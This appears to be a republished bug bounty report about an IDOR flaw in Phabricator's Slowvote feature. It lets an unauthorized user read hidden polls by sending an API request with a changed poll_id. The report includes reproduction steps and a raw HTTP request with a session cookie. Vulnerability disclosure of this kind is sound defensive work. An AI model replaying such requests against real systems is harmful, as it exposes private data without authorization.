IDOR bug to See hidden slowvote of any user even when you dont have access right
Discovered by ranjit_p on Phabricator

This issue took 1 Days and 19 hours to triage and 1 Days and 4 hours to close the report once triaged.


  1. user A (who create slowvote)
  2. User B (Dont have permissioon to see above slowvote)
  3. User C (has permission to see above slowvote)


  1. From user A account goto and create a slowvote . Change this slowvote "Visible To" to "No one" or to user C . Slowvote url will be now like .

  2. Now user B visit above slowvote url and see that he dont have access permission . Now user B sent bellow request and can see any hidden slowvote

POST /api/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Connection: close
Cookie: phsid=smpm4rp6yltbzna3qda2nwbomsoidzwjfshkkw7v; phusr=admin
Upgrade-Insecure-Requests: 1


here just change poll_id parameter value to your target poll id and see that hidden poll


Fix this